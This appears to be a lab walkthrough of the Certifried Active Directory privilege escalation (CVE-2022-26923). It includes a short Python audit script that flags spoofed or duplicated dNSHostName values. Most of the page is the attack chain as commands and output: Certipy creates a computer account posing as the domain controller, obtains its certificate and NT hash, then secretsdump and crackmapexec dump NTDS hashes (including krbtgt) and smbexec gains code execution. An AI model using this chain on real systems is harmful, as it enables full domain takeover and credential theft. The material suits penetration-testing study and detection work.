# Certifried - CVE-2022–26923

* Oliver Lyak found a way for a low-privileged domain user to escalate privileges in Active Directory. It consists of changing the dNSHostName attribute of a computer account the user created. The idea is the same as the samAccountName vulnerability: a name confusion during authentication. Details are here: <https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4>

An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System.
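As an added defender-side example (not the page's or Certipy's own code), the audit below flags computer accounts whose dNSHostName does not match their sAMAccountName or is shared with another computer object, which is the precondition the steps below rely on. The account list and the `is_dc` flag are constructed from the lab's host names; in a real run they would come from an LDAP search for `(objectClass=computer)`.

```python
from collections import defaultdict
from typing import Dict, List

DOMAIN = "maryland.local"  # lab domain used on this page

# Constructed sample of what an LDAP search for (objectClass=computer) could return.
# 'is_dc' stands in for the SERVER_TRUST_ACCOUNT bit (0x2000) of userAccountControl.
# 'certifriedpc$' is the account the walkthrough creates with a spoofed dNSHostName.
COMPUTERS: List[Dict[str, object]] = [
    {"sAMAccountName": "BALTIMORE$", "dNSHostName": "baltimore.maryland.local", "is_dc": True},
    {"sAMAccountName": "SALISBURY$", "dNSHostName": "salisbury.maryland.local", "is_dc": False},
    {"sAMAccountName": "newyork$", "dNSHostName": "newyork.maryland.local", "is_dc": False},
    {"sAMAccountName": "certifriedpc$", "dNSHostName": "baltimore.maryland.local", "is_dc": False},
]


def expected_dns_hostname(sam: str, domain: str = DOMAIN) -> str:
    """Value a normal domain join sets: host part of sAMAccountName plus the DNS suffix."""
    return f"{sam.rstrip('$').lower()}.{domain.lower()}"


def audit_dns_hostnames(computers: List[Dict[str, object]], domain: str = DOMAIN) -> List[str]:
    """Return one finding string per suspicious condition, in a stable order.

    Check 1: dNSHostName differs from what sAMAccountName implies. Hosts with a
             different DNS suffix also trip this, so treat it as a lead to verify.
    Check 2: one dNSHostName claimed by several computer objects. This is what
             Certifried needs: the CA puts that name in the Machine certificate
             and PKINIT maps it to the other (here, the DC) account.
    """
    findings: List[str] = []
    is_dc = {str(c["sAMAccountName"]): bool(c["is_dc"]) for c in computers}
    by_dns: Dict[str, List[str]] = defaultdict(list)
    for c in computers:
        sam, dns = str(c["sAMAccountName"]), str(c["dNSHostName"]).lower()
        by_dns[dns].append(sam)
        if dns != expected_dns_hostname(sam, domain):
            findings.append(f"MISMATCH {sam}: dNSHostName={dns} "
                            f"expected={expected_dns_hostname(sam, domain)}")
    for dns, sams in sorted(by_dns.items()):
        if len(sams) > 1:
            sev = "CRITICAL" if any(is_dc[s] for s in sams) else "HIGH"
            findings.append(f"{sev} {dns} is claimed by {len(sams)} accounts: {', '.join(sams)}")
    return findings


if __name__ == "__main__":
    for line in audit_dns_hostnames(COMPUTERS):
        print(line)
```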

* Create a computer account with a domain user and set its dNSHostName to a fake DNS name: the domain controller's.

```
sudo certipy account create -u joaquin.Pereida@maryland.local -p 'horse' -user 'certifriedpc' -pass 'certifriedpass' -dns 'baltimore.maryland.local'
```

* Request a certificate for the created computer account on the Machine template

```
sudo certipy req -u 'certifriedpc$'@maryland.local -p 'certifriedpass' -target salisbury.maryland.local -ca MARYLAND-CA -template Machine
```

* Authenticate with the certificate as baltimore$ (the DC)

```
sudo certipy auth -pfx baltimore.pfx -username 'baltimore$' -domain maryland.local -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759

```

* Export the credential cache path as an environment variable
* Dump NTDS with the Kerberos ticket we just got

```
export KRB5CCNAME=/home/watchdog/Attacking_Active_Directory/ESC6/baltimore.ccache
```

```
sudo secretsdump.py -k -no-pass -just-dc-user carmelo.Anthony MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local


Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
[*] Kerberos keys grabbed
carmelo.Anthony:aes256-cts-hmac-sha1-96:da49788946f1189c92fda8683bd91bc0b18933a0cb5770d30c9f4648b9fefb20
carmelo.Anthony:aes128-cts-hmac-sha1-96:e728e401a5678362449ceacd2b53dec9
carmelo.Anthony:des-cbc-md5:5ed5d58f941ac4d3
[*] Cleaning up... 

```

* Delete the created computer account with a domain admin user

```
sudo certipy account delete -u carmelo.Anthony@maryland.local -hashes 'aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' -user 'certifriedpc'
```

Dump NTDS or get code execution with the recovered hash

```
crackmapexec smb 192.168.56.12 -u carmelo.anthony -H 'aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a' --ntds

SMB         192.168.56.12   445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         192.168.56.12   445    BALTIMORE        [+] maryland.local\carmelo.anthony:34534854d33b398b66684072224bb47a (Pwn3d!)
SMB         192.168.56.12   445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.56.12   445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         192.168.56.12   445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1ad253c7f9110449bd1ccbcadf2ca611:::
SMB         192.168.56.12   445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         192.168.56.12   445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
SMB         192.168.56.12   445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         192.168.56.12   445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         192.168.56.12   445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         192.168.56.12   445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         192.168.56.12   445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759:::
SMB         192.168.56.12   445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
SMB         192.168.56.12   445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:16827e6dccaaa8328e7092324980f207:::
```

```
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a 'MARYLAND'/'carmelo.anthony'@'maryland.local'
```
